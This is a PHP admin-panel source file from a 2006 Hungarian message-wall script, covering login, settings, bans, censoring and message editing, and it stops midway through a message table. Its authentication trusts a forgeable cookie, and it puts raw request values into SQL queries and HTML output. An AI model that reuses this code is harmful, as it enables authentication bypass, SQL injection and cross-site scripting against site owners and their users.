<?php
/**************************************************************************
* PHP Üzenőfal v2.5 - admin.php                                           *
* ======================================================================= *
* Adminfelület                                                            *
* ----------------------------------------------------------------------- *
* Admin                                                                   *
* ======================================================================= *
* Ezt a programot a PHP Studio fejlesztette, a szerzők: / This program    *
* was developed by the PHP Studio, the authors:                           *
* Warner                                                                  *
* ----------------------------------------------------------------------- *
* Weboldalunk / Our webpage: http://www.phpstudio.hu                      *
* Segítségnyújtás / HelpDesk: http://forum.phpstudio.hu                   *
* Kapcsolat / Contact: warner@phpstudio.hu                                *
* ======================================================================= *
* Ez a program license alatt áll, amit itt tekinthetsz meg: / This        *
* program is under a license, which you can see here:                     *
* http://license.phpstudio.hu                                             *
* ----------------------------------------------------------------------- *
* A license-szel kapcsolatos észrevételeid, megjegyzéseid, kérdéseid  a   *
* license@phpstudio.hu e-mail címen várjuk.                               *
* ----------------------------------------------------------------------- *
* You can send your remarks, opinions, questions to the following e-mail  *
* address: license@phpstudio.hu                                           *
* ======================================================================= *
* Dátum / Date: 2006. 08. 03.                                             *
**************************************************************************/

if(!@require("sql.php"))
	{
	die("sql.php nem található itt: " . basename($_SERVER["PHP_SELF"]) . " !");
	}
		
if(isset($_POST["adminpasswdsubmit"]))
	{
	$settings_require = array("adminpasswd");
	while(list($key, $setting) = each($settings_require))
		{
		$setting_get = mysql_query("SELECT value FROM {$dbprefix}settings WHERE variable = '$setting'");
		$setting_all = mysql_fetch_row($setting_get);
		$current[$setting] = $setting_all[0];
		}
	$passwd_sha1 = sha1($_POST["adminpasswd"]);
	if($passwd_sha1 == $current["adminpasswd"])
		{
		setcookie("adminmessage", "admin", time() + 2 * 3600);
		header("Location: admin.php");
		}
	else
		{
		$loginresult = false;
		}
	}				

if(isset($_GET["action"]))
	{
	$action = $_GET["action"];
	if($action != "message" && $action != "settings" && $action != "ban" && $action != "censor" && $action != "passwd" && $action != "logout")
		{
		$action = "message";
		}
	}
else
	{
	$action = "message";
	}
	
if($action == "logout")
	{
	setcookie("adminmessage", "admin", time() - 2 * 3600);
	header("Location: admin.php");
	}	

echo '<style type="text/css">
<!--
td.header {
	font-size: 16px;
	font-weight: bold;
	border-bottom-width: thin;
	border-bottom-color: #000000;
	border-bottom-style: dashed;
	padding-left: 5px;
	padding-bottom: 5px;
}

td.sub {
	padding-top: 10px;
}
	
p.header {
	font-size: 16px;
	font-weight: bold;
	border-bottom-width: thin;
	border-bottom-color: #000000;
	border-bottom-style: solid;
	padding-left: 5px;
	padding-right: 5px;
	padding-bottom: 5px;
}

p.resultsuccess {
	font-size: 16px;
	font-weight: bold;
	color: #008000;
	text-align: center;
}

p.resulterror {
	font-size: 16px;
	font-weight: bold;
	color: #D70000;
	text-align: center;
}

a.menu {
	font-size: 16px;
	font-weight: bold;
	text-decoration: none;
	color: #000000;
}
-->
</style>';

	
if(isset($_COOKIE["adminmessage"]))
	{
	if($_COOKIE["adminmessage"] == "admin")
		{
		if(is_file("install.php"))
			{
			unlink("install.php");
			}
			
		print('<table border="0" align="center" id="adminpanel" width="600" height="500" bgcolor="#B7C2DF">'
			. '<tr><td height="60">'
			. '<p class="header" align="center"><a class="menu" href="?action=message" target="_self"');
			if($action == "message")
				{
				print(' style="text-decoration: underline;"');
				}
			print('>Üzenetek</a> '
			. '| <a class="menu" href="?action=settings" target="_self"');
			if($action == "settings")
				{
				print(' style="text-decoration: underline;"');
				}
			print('>Beállítások</a> '
			. '| <a class="menu" href="?action=ban" target="_self"');
			if($action == "ban")
				{
				print(' style="text-decoration: underline;"');
				}
			print('>Tiltólista</a> '
			. '| <a class="menu" href="?action=censor" target="_self"');
			if($action == "censor")
				{
				print(' style="text-decoration: underline;"');
				}
			print('>Cenzúra</a> '

			. '| <a class="menu" href="?action=passwd" target="_self"');
			if($action == "passwd")
				{
				print(' style="text-decoration: underline;"');
				}
			print('>Jelszócsere</a> '
			. '| <a class="menu" href="?action=logout" target="_self">Kijelentkezés</a></p>'
			. '</td></tr>'
			. '<tr><td valign="top">');
			
		if($action == "settings")
			{
			if(isset($_POST["uzenofal_submit_settings"]))
				{
				$new_inputsize = $_POST["uzenofal_inputsize"];
				$new_inputlength = $_POST["uzenofal_inputlength"];
				$new_inputwaitlength = $_POST["uzenofal_inputwaitlength"];
				$new_outputshow = $_POST["uzenofal_outputshow"];
				$new_outputlist = $_POST["uzenofal_outputlist"];
				$new_outputseparator = $_POST["uzenofal_outputseparator"];
				$new_outputshowlinkcolor = $_POST["uzenofal_outputshowlinkcolor"];
				$new_outputlistlinkcolor = $_POST["uzenofal_outputlistlinkcolor"];
				$new_outputlinktarget = $_POST["uzenofal_outputlinktarget"];
				$new_outputseededmessage = $_POST["uzenofal_outputseededmessage"];
				mysql_query("UPDATE {$dbprefix}settings SET value='$new_outputseparator' WHERE variable = 'outputSeparator'");
				mysql_query("UPDATE {$dbprefix}settings SET value='$new_outputseededmessage' WHERE variable = 'outputSeededMessage'");
				if(is_numeric($new_inputsize))
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='$new_inputsize' WHERE variable = 'inputSize'");
					}
				if(is_numeric($new_inputlength))
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='$new_inputlength' WHERE variable = 'inputLength'");
					}
				if(is_numeric($new_inputwaitlength))
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='$new_inputwaitlength' WHERE variable = 'inputWaitLength'");
					}		
				if(is_numeric($new_outputshow))
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='$new_outputshow' WHERE variable = 'outputShow'");
					}
				if(is_numeric($new_outputlist))
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='$new_outputlist' WHERE variable = 'outputList'");
					}
				if(substr($new_outputshowlinkcolor, 0, 1) == "#")
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='$new_outputshowlinkcolor' WHERE variable = 'outputShowLinkColor'");
					}
				if(substr($new_outputlistlinkcolor, 0, 1) == "#")
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='$new_outputlistlinkcolor' WHERE variable = 'outputListLinkColor'");
					}
				if(substr($new_outputlinktarget, 0, 1) == "_")
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='$new_outputlinktarget' WHERE variable = 'outputLinkTarget'");
					}
				if(isset($_POST["uzenofal_inputwait"]) && $_POST["uzenofal_inputwait"] == "selected")
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='1' WHERE variable = 'inputWait'");
					}
				else
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='0' WHERE variable = 'inputWait'");
					}
				if(isset($_POST["uzenofal_inputhtml"]) && $_POST["uzenofal_inputhtml"] == "selected")
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='1' WHERE variable = 'inputHTML'");
					}
				else
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='0' WHERE variable = 'inputHTML'");
					}
				if(isset($_POST["uzenofal_outputlink"]) && $_POST["uzenofal_outputlink"] == "selected")
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='1' WHERE variable = 'outputLink'");
					}
				else
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='0' WHERE variable = 'outputLink'");
					}
				if(isset($_POST["uzenofal_outputseeded"]) && $_POST["uzenofal_outputseeded"] == "selected")
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='1' WHERE variable = 'outputSeeded'");
					}
				else
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='0' WHERE variable = 'outputSeeded'");
					}
				if(isset($_POST["uzenofal_inputcensor"]) && $_POST["uzenofal_inputcensor"] == "selected")
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='1' WHERE variable = 'inputCensor'");
					}
				else
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='0' WHERE variable = 'inputCensor'");
					}
				if(isset($_POST["uzenofal_outputcensor"]) && $_POST["uzenofal_outputcensor"] == "selected")
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='1' WHERE variable = 'outputCensor'");
					}
				else
					{
					mysql_query("UPDATE {$dbprefix}settings SET value='0' WHERE variable = 'outputCensor'");
					}
				}			
	
			$settings_require = array("adminpasswd", "inputSize", "inputLength", "inputWait", "inputWaitLength", "inputHTML", "outputShow", "outputList", "outputSeparator", "outputLink", "outputShowLinkColor", "outputListLinkColor", "outputLinkTarget", "outputSeeded", "outputSeededMessage", "inputCensor", "outputCensor");
			while(list($key, $setting) = each($settings_require))
				{
				$setting_get = mysql_query("SELECT value FROM {$dbprefix}settings WHERE variable = '$setting'");
				$setting_all = mysql_fetch_row($setting_get);
				$current[$setting] = $setting_all[0];
				}
	
			echo '<style type="text/css">
			<!--
			.menuskin{
			position:absolute;
			width:200px;
			background-color: menu;
			border: 2px solid black;
			font:normal 10px Verdana;
			line-height:18px;
			z-index:100;
			visibility:hidden;
			padding-left: 10px;
			}
			
			.menuskin a {
			text-decoration:none;
			color:black;
			padding-left: 10px;
			padding-right: 10px;
			}
			
			#mouseoverstyle {
			background-color:highlight;
			}
			
			#mouseoverstyle a {
			color:white;
			}
			-->
			</style>';
			echo '<script language="JavaScript1.2">
			<!--
			var linkset=new Array()

			linkset["inputsize"]=\'Az üzenetbeviteli mező hossza.\'
			linkset["inputlength"]=\'A bevihető üzenet hossza karakterben. (Maximálisan 65535.)\'
			linkset["inputwait"]=\'Kelljen e várni két üzenetküldés között?\'
			linkset["inputwaitlength"]=\'A két üzenetküldés között várandó órák száma (ha kell várni).\'
			linkset["inputhtml"]=\'Lehessen-e HTML-t használni az üzenetekben? <b>(Nem ajánlott.)</b>\'
			linkset["outputshow"]=\'A görgetősávon megjelenített üzenetek száma.\'
			linkset["outputlist"]=\'A listázáskor megjelenített üzenetek száma.\'
			linkset["outputseparator"]=\'A görgetősávon az üzenetek közötti elválasztó. (Szóköz automatikusan lesz.)\'
			linkset["outputlink"]=\'Kattintható linkek engedélyezése.\'
			linkset["outputshowlinkcolor"]=\'Linkek színe a görgetősávon. (üres=fehér)\'
			linkset["outputlistlinkcolor"]=\'Linkek színe listázáskor. (üres=fekete)\'
			linkset["outputlinktarget"]=\'Linkek targetje. (<b>_blank</b> = új ablakban nyílik, <b>_self</b> = ugyanabban az abalakban nyílik.)\'
			linkset["outputseeded"]=\'A kiemelt üzenetk mindig legelöl jelennek meg és nem kerülnek cenzúrázásra.\'
			linkset["outputseededmessage"]=\'A kiemelt üzenet (ha engedélyezve van).\'
			linkset["inputcensor"]=\'A bemeneti cenzúra még a letárolás előtt javítja az üzeneteket.\'
			linkset["outputcensor"]=\'A kimeneti cenzúra közvetelenül a megjelenítés előtt javítja az üzeneteket.\'


			var ie4=document.all&&navigator.userAgent.indexOf("Opera")==-1
			var ns6=document.getElementById&&!document.all
			var ns4=document.layers

			function showmenu(e,which){

			if (!document.all&&!document.getElementById&&!document.layers)
			return

			clearhidemenu()

			menuobj=ie4? document.all.popmenu : ns6? document.getElementById("popmenu") : ns4? document.popmenu : ""
			menuobj.thestyle=(ie4||ns6)? menuobj.style : menuobj

			if (ie4||ns6)
			menuobj.innerHTML=which
			else{
			menuobj.document.write(\'<layer name=gui bgColor=#E6E6E6 width=165 onmouseover="clearhidemenu()" onmouseout="hidemenu()">\'+which+\'</layer>\')
			menuobj.document.close()
			}

			menuobj.contentwidth=(ie4||ns6)? menuobj.offsetWidth : menuobj.document.gui.document.width
			menuobj.contentheight=(ie4||ns6)? menuobj.offsetHeight : menuobj.document.gui.document.height
			eventX=ie4? event.clientX : ns6? e.clientX : e.x
			eventY=ie4? event.clientY : ns6? e.clientY : e.y

			var rightedge=ie4? document.body.clientWidth-eventX : window.innerWidth-eventX
			var bottomedge=ie4? document.body.clientHeight-eventY : window.innerHeight-eventY

			if (rightedge<menuobj.contentwidth)
			
			menuobj.thestyle.left=ie4? document.body.scrollLeft+eventX-menuobj.contentwidth : ns6? window.pageXOffset+eventX-menuobj.contentwidth : eventX-menuobj.contentwidth
			else

			menuobj.thestyle.left=ie4? document.body.scrollLeft+eventX : ns6? window.pageXOffset+eventX : eventX

			if (bottomedge<menuobj.contentheight)
			menuobj.thestyle.top=ie4? document.body.scrollTop+eventY-menuobj.contentheight : ns6? window.pageYOffset+eventY-menuobj.contentheight : eventY-menuobj.contentheight
			else
			menuobj.thestyle.top=ie4? document.body.scrollTop+event.clientY : ns6? window.pageYOffset+eventY : eventY
			menuobj.thestyle.visibility="visible"
			return false
			}

			function contains_ns6(a, b) {

			while (b.parentNode)
			if ((b = b.parentNode) == a)
			return true;
			return false;
			}

			function hidemenu(){
			if (window.menuobj)
			menuobj.thestyle.visibility=(ie4||ns6)? "hidden" : "hide"
			}

			function dynamichide(e){
			if (ie4&&!menuobj.contains(e.toElement))
			hidemenu()
			else if (ns6&&e.currentTarget!= e.relatedTarget&& !contains_ns6(e.currentTarget, e.relatedTarget))
			hidemenu()
			}

			function delayhidemenu(){
			if (ie4||ns6||ns4)
			delayhide=setTimeout("hidemenu()", 050)
			}

			function clearhidemenu(){
			if (window.delayhide)
			clearTimeout(delayhide)
			}

			function highlightmenu(e,state){
			if (document.all)
			source_el=event.srcElement
			else if (document.getElementById)
			source_el=e.target
			if (source_el.className=="menuitems"){
			source_el.id=(state=="on")? "mouseoverstyle" : ""
			}
			else{
			while(source_el.id!="popmenu"){
			source_el=document.getElementById? source_el.parentNode : source_el.parentElement
			if (source_el.className=="menuitems"){
			source_el.id=(state=="on")? "mouseoverstyle" : ""
			}
			}
			}
			}

			if (ie4||ns6)
			document.onclick=hidemenu
			//-->
			</script>
			<DIV id="popmenu" class="menuskin" onMouseover="clearhidemenu();highlightmenu(event,\'on\')" onMouseout="highlightmenu(event,\'off\');dynamichide(event)">
			</DIV>';
			
			print('<form name="settingsmessage" action="?action=settings" target="_self" method="post">'
				. '<table border="0" align="center" id="settingsmessage">'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'inputsize\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Beviteli mező hossza:</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_inputsize" type="text" size="5" maxlength="5" value="' . $current["inputSize"] . '"></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'inputlength\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Bevihető üzenet hossza:</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_inputlength" type="text" size="5" maxlength="5" value="' . $current["inputLength"] . '"></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'inputwait\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Kivárási idő engedélyezése</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_inputwait" type="checkbox" value="selected"');
			if($current["inputWait"] == 1)
				{
				print(' checked');
				}
			print('></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'inputwaitlength\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Kivárási idő hossza:</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_inputwaitlength" type="text" size="10" maxlength="10" value="' . $current["inputWaitLength"] . '"></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'inputhtml\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">HTML engedélyezése az üzenetekben:</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_inputhtml" type="checkbox" value="selected"');
			if($current["inputHTML"] == 1)
				{
				print(' checked');
				}
			print('></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20">&nbsp;</td>'	
				. '<td class="sub">&nbsp;</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub">&nbsp;</td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'outputshow\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Görgetősávon üzenetek száma:</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_outputshow" type="text" size="5" maxlength="5" value="' . $current["outputShow"] . '"></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'outputlist\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Listázandó üzenetek száma:</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_outputlist" type="text" size="5" maxlength="5" value="' . $current["outputList"] . '"></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'outputseparator\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Üzenetelválasztó:</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_outputseparator" type="text" size="20" maxlength="65535" value="' . $current["outputSeparator"] . '"></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'outputlink\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Linkek engedélyezése</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_outputlink" type="checkbox" value="selected"');
			if($current["outputLink"] == 1)
				{
				print(' checked');
				}
			print('></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'outputshowlinkcolor\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Linkek színe a görgetősávon:</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_outputshowlinkcolor" type="text" size="7" maxlength="7" value="' . $current["outputShowLinkColor"] . '"></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'outputlistlinkcolor\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Linkek színe listázáskor:</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_outputlistlinkcolor" type="text" size="7" maxlength="7" value="' . $current["outputListLinkColor"] . '"></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'outputlinktarget\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Linkek targetje:</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_outputlinktarget" type="text" size="15" maxlength="20" value="' . $current["outputLinkTarget"] . '"></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20">&nbsp;</td>'	
				. '<td class="sub">&nbsp;</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub">&nbsp;</td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'outputseeded\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Kiemelt üzenet engedélyezése</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_outputseeded" type="checkbox" value="selected"');
			if($current["outputSeeded"] == 1)
				{
				print(' checked');
				}
			print('></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'outputseedemessage\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Kiemelt üzenet:</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_outputseededmessage" type="text" size="20" maxlength="65535" value="' . $current["outputSeededMessage"] . '"></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20">&nbsp;</td>'	
				. '<td class="sub">&nbsp;</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub">&nbsp;</td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'inputcensor\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Bemeneti cenzúra engedélyezése</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_inputcensor" type="checkbox" value="selected"');
			if($current["inputCensor"] == 1)
				{
				print(' checked');
				}
			print('></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20"><a href="#" target="_self" onMouseover="showmenu(event,linkset[\'outputcensor\'])" onMouseout="delayhidemenu()"><img src="images/info.gif" border="0" width="16" height="16" alt=""></a></td>'	
				. '<td class="sub">Kimeneti cenzúra engedélyezése</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_outputcensor" type="checkbox" value="selected"');
			if($current["outputCensor"] == 1)
				{
				print(' checked');
				}
			print('></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20">&nbsp;</td>'	
				. '<td class="sub">&nbsp;</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub">&nbsp;</td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20">&nbsp;</td>'
				. '<td class="sub" align="right"><input name="uzenofal_submit_settings" type="submit" value="Módosít"></td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub">&nbsp;</td>'
				. '</tr>'
				. '</table>'
				. '</form>');	
			}
			
		elseif($action == "passwd")
			{
			$settings_require = array("adminpasswd");
			while(list($key, $setting) = each($settings_require))
				{
				$setting_get = mysql_query("SELECT value FROM {$dbprefix}settings WHERE variable = '$setting'");
				$setting_all = mysql_fetch_row($setting_get);
				$current[$setting] = $setting_all[0];
				}
			if(isset($_POST["uzenofal_submit_passwd"]))
				{
				$oldpass = $_POST["uzenofal_passwdold"];
				$newpass1 = $_POST["uzenofal_passwdnew1"];
				$newpass2 = $_POST["uzenofal_passwdnew2"];
				if(sha1($oldpass) == $current["adminpasswd"])
					{
					if($newpass1 == $newpass2)
						{
						$newpass = sha1($newpass1);
						mysql_query("UPDATE {$dbprefix}settings SET value='$newpass' WHERE variable = 'adminpasswd'");
						$passwdresult = 3;
						}
					else
						{
						$passwdresult = 2;
						}
					}
				else
					{
					$passwdresult = 1;
					}
				}
								
			print('<form name="passwdmessage" action="?action=passwd" target="_self" method="post">'
				. '<table border="0" align="center" id="passwdmessage">'
				. '<tr>'
				. '<td class="sub" width="20">&nbsp;</td>'	
				. '<td class="sub">Régi jelszó:</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_passwdold" type="password" size="30" value=""></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20">&nbsp;</td>'	
				. '<td class="sub">Új jelszó:</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_passwdnew1" type="password" size="30" value=""></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20">&nbsp;</td>'	
				. '<td class="sub">Új jelszó megerősítése:</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub"><input name="uzenofal_passwdnew2" type="password" size="30" value=""></td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20">&nbsp;</td>'	
				. '<td class="sub">&nbsp;</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub">&nbsp;</td>'
				. '</tr>'
				. '<tr>'
				. '<td class="sub" width="20">&nbsp;</td>'
				. '<td class="sub">&nbsp;</td>'
				. '<td class="sub" width="10">&nbsp;</td>'
				. '<td class="sub" align="left"><input name="uzenofal_submit_passwd" type="submit" value="Módosít"></td>'
				. '</tr>'
				. '</table>'
				. '</form>');
				
			if(isset($passwdresult))
				{
				print('<br>');
				if($passwdresult == 1)
					{
					print('<p class="resulterror">Hibás jelszó!</p>');
					}
				elseif($passwdresult == 2)
					{
					print('<p class="resulterror">A két megadott jelszó nem egyezik!</p>');
					}
				elseif($passwdresult == 3)
					{
					print('<p class="resultsuccess">Jelszavad megváltozott!</p>');
					}
				}
			}
			
		elseif($action == "censor")
			{
			if(isset($_POST["uzenofal_submit_censor"]))
				{
				$censor_input = $_POST["uzenofal_censorinput"];
				$censor_output = $_POST["uzenofal_censoroutput"];
				mysql_query("INSERT INTO {$dbprefix}censor (input, output) VALUES ('$censor_input', '$censor_output')");
				}
			if(isset($_GET["del"]))
				{
				$delid = $_GET["del"];
				if(is_numeric($delid))
					{
					mysql_query("DELETE FROM {$dbprefix}censor WHERE ID = '$delid'");
					}
				}
				
			print('<form name="addcensor" action="?action=censor" target="_self" method="post">'
				. '<p style="text-align: center; padding-top: 8px;"><input name="uzenofal_censorinput" type="text" size="15" value=""> kifejezés cserélése <input name="uzenofal_censoroutput" type="text" size="15" value=""> kifejezésre. <input name="uzenofal_submit_censor" type="submit" value="Hozzáad"></p>'
				. '</form>');
				
			$cenzur_get = mysql_query("SELECT ID, input, output FROM {$dbprefix}censor ORDER BY input");
			print('<table border="0" align="center" id="censormessage">'
				. '<tr>'
				. '<td class="header" style="padding-left: 0px; text-align:center;">Mit</td>'
				. '<td class="header" style="padding-left: 0px;" width="30" align="center"> => </td>'
				. '<td class="header" style="padding-left: 0px; text-align:center;">Mire</td>'
				. '<td class="header" style="padding-left: 0px;" width="30" align="right">&nbsp;</td>'
				. '</tr>');
			while($cenzur_all = mysql_fetch_row($cenzur_get))
				{
				$cenzur_id = $cenzur_all[0];
				$cenzur_input = $cenzur_all[1];
				$cenzur_output = $cenzur_all[2];
				print('<tr>'
				. '<td class="sub">' . $cenzur_input . '</td>'
				. '<td class="sub" width="30" align="center"> => </td>'
				. '<td class="sub">' . $cenzur_output . '</td>'
				. '<td class="sub" width="30" align="right"><a href="?action=censor&del=' . $cenzur_id . '" target="_self"><img src="images/delete.png" border="0" width="16" height="16" alt="Törlés"></a></td>'
				. '</tr>');
				}
			print('</table>');
			}
			
		elseif($action == "message")
			{
			if(isset($_POST["uzenofal_submit_message"]))
				{
				$modifyid = $_POST["uzenofal_modifyid"];
				$modifymessage = addslashes($_POST["uzenofal_modifymessage"]);
				mysql_query("UPDATE {$dbprefix}messages SET message = '$modifymessage' WHERE ID = '$modifyid'");
				}
			if(isset($_GET["limit"]))
				{
				if(is_numeric($_GET["limit"]))
					{
					$limit = $_GET["limit"];
					}
				else
					{
					$limit = 1;
					}
				}
			else
				{
				$limit = 1;
				}
			if(isset($_GET["del"]))
				{
				$delid = $_GET["del"];
				if(is_numeric($delid))
					{
					mysql_query("DELETE FROM {$dbprefix}messages WHERE ID = '$delid'");
					}
				}
			if(isset($_GET["ban"]))
				{
				$banip = $_GET["ban"];
				$nowtime = time();
				mysql_query("INSERT INTO {$dbprefix}bans (IP, time) VALUES ('$banip', '$nowtime')");
				}
			print('<p>&nbsp;</p>');
			if(isset($_GET["edit"]))
				{
				$editid = $_GET["edit"];
				if(is_numeric($editid))
					{
					$currentmessage_get = mysql_query("SELECT message FROM {$dbprefix}messages WHERE ID = '$editid'");
					$currentmessage = mysql_fetch_row($currentmessage_get);
					$currentmessage[0] = str_replace('\"', '"', $currentmessage[0]);
					$currentmessage[0] = str_replace("\'", "'", $currentmessage[0]);
					$currentmessage[0] = str_replace("\\\\", "\\", $currentmessage[0]);
					$currentmessage[0] = str_replace('"', "'", $currentmessage[0]);
					print('<form name="modifymessage" action="?action=message" target="_self" method="post">'
						. '<input name="uzenofal_modifyid" type="hidden" value="' . $editid . '">'
						. '<p style="text-align: center; padding-top: 8px;"><input name="uzenofal_modifymessage" type="text" size="40" value="' . $currentmessage[0] . '"> <input name="uzenofal_submit_message" type="submit" value="Módosít"></p>'
						. '</form>');
					}
				}				
			$rows_get = mysql_query("SELECT * FROM {$dbprefix}messages");
			$rows = mysql_num_rows($rows_get);
			if($rows == 0)
				{
				print('<p align="center"><b>Nincsen egyetlen üzenet sem!</b></p>');
				}
			else
				{
				$list_number = 20;
				$start = ($limit - 1) * $list_number;
				if($start > $rows)
					{
					$start = $rows;
					}
				$length = $rows - $start;
				if($length > $list_number)
					{
					$length = $list_number;
					}
				$limit_start = $rows - $start - $length;
	
				$message_get = mysql_query("SELECT ID, message, IP, time FROM {$dbprefix}messages ORDER BY ID LIMIT $limit_start, $length");
				print('<table border="0" align="center" id="editmessages">'
					. '<tr>'
					. '<td class="header" style="padding-left: 0px; text-align:center;">Üzenet</td>'
